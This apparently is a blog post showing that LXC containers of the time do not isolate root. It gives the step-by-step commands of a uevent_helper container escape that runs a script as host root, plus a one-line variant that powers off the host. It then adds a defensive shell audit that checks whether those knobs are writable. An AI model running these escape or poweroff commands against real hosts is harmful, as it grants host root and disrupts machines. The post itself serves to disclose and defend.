It is important to understand that not all the pieces are in place yet, so
currently an LXC container does not provide the same isolation as other
virtualization technologies.
This example shows how the root user of a container can easily run code as
root on the host, because sysfs is not namespaced: the /sys that the
container mounts is the host's /sys, and /sys/kernel/uevent_helper sets
the program the host kernel runs for every uevent:
lxc$ cat <<END > /tmp/evil-helper
#!/bin/sh
echo 'hi!' >> /tmp/evil-helper.log
END
lxc$ chmod +x /tmp/evil-helper
lxc# mkdir /sys
lxc# mount -t sysfs sysfs /sys
lxc# echo /var/lib/lxc/test/rootfs/tmp/evil-helper > /sys/kernel/uevent_helper
lxc# echo change > /sys/class/mem/null/uevent
The last command triggers a uevent, which the host kernel handles by
running, in the host's context, the helper script we created inside the
container. Note that the path written to uevent_helper is the path of the
script as seen from the host (the container's rootfs lives under
/var/lib/lxc/test/rootfs), and that the log line ends up in the host's
/tmp rather than the container's, which confirms where the script ran.
Or, to take the host down instead:
lxc# echo /sbin/poweroff > /sys/kernel/uevent_helper
after which the next uevent on the host, whoever triggers it, powers off
the machine.
Because of this, LXC containers are vulnerable to a malicious root user
and are not yet a replacement for OpenVZ. This will change when support
for labelling files with user namespaces is completed, so that uid 0
inside a container is no longer uid 0 on the host.
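As an added example, not part of the original post, here is a small POSIX
shell audit that checks from inside a container whether the knob used above
is reachable. It assumes two things: that the kernel exposes the same uevent
helper path both as /sys/kernel/uevent_helper and as the sysctl
/proc/sys/kernel/hotplug (true on Linux of this era, so a read-only /sys alone
does not close the hole), and that the mount tables handed to
sysfs_mount_mode are constructed samples rather than captures from a real
host. The function names are my own.

```shell
#!/bin/sh
# Added example (not from the original post): audit a container for the
# uevent_helper escape described above. The same kernel setting is reachable
# through two files, so both are checked:
#   /sys/kernel/uevent_helper   (sysfs)
#   /proc/sys/kernel/hotplug    (procfs sysctl)   -- assumption: same knob

# sysfs_mount_mode MOUNTS_TEXT
#   Given the contents of /proc/self/mounts (or a constructed sample), print
#   "rw", "ro" or "absent" for the sysfs instance mounted at /sys.
sysfs_mount_mode() {
    printf '%s\n' "$1" | awk '
        $2 == "/sys" && $3 == "sysfs" {
            # field 4 is the option list, e.g. "rw,nosuid,relatime"
            n = split($4, opts, ",")
            mode = "rw"
            for (i = 1; i <= n; i++) if (opts[i] == "ro") mode = "ro"
            found = 1
        }
        END { print (found ? mode : "absent") }'
}

# helper_writable FILE
#   Succeed (exit 0) if FILE exists and the current user may write to it,
#   i.e. a helper path could be planted through it.
helper_writable() {
    [ -w "$1" ]
}

# audit_live
#   Run the checks against the running system and print a verdict per knob.
#   Run this as root inside the container to reproduce the post's conditions.
audit_live() {
    mode=$(sysfs_mount_mode "$(cat /proc/self/mounts)")
    echo "sysfs at /sys: $mode"
    for f in /sys/kernel/uevent_helper /proc/sys/kernel/hotplug; do
        if helper_writable "$f"; then
            echo "WRITABLE: $f (uevent helper can be hijacked from here)"
        else
            echo "ok: $f is not writable by this user"
        fi
    done
}

# Constructed sample mount tables for offline use (not captured from a host).
SAMPLE_RW='proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0'
SAMPLE_RO='proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0'
SAMPLE_NONE='proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0'

# Offline demonstration of the mount-table check:
#   sysfs_mount_mode "$SAMPLE_RW"   -> rw
#   sysfs_mount_mode "$SAMPLE_RO"   -> ro
#   sysfs_mount_mode "$SAMPLE_NONE" -> absent
if [ "${1:-}" = "--live" ]; then
    audit_live
fi
```

Run it with --live as root inside a container to see whether either file is
writable. Mounting /sys and /proc/sys read-only from the host side closes the
write paths, but only as long as the container cannot remount them: a
container root that still holds CAP_SYS_ADMIN can mount a fresh read-write
sysfs exactly as the post does with `mount -t sysfs sysfs /sys`.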
[0] http://lxc.sourceforge.net/
[1] http://wiki.openvz.org/
Permalink: http://blog.bofh.it/debian/id_413
Best Regards, David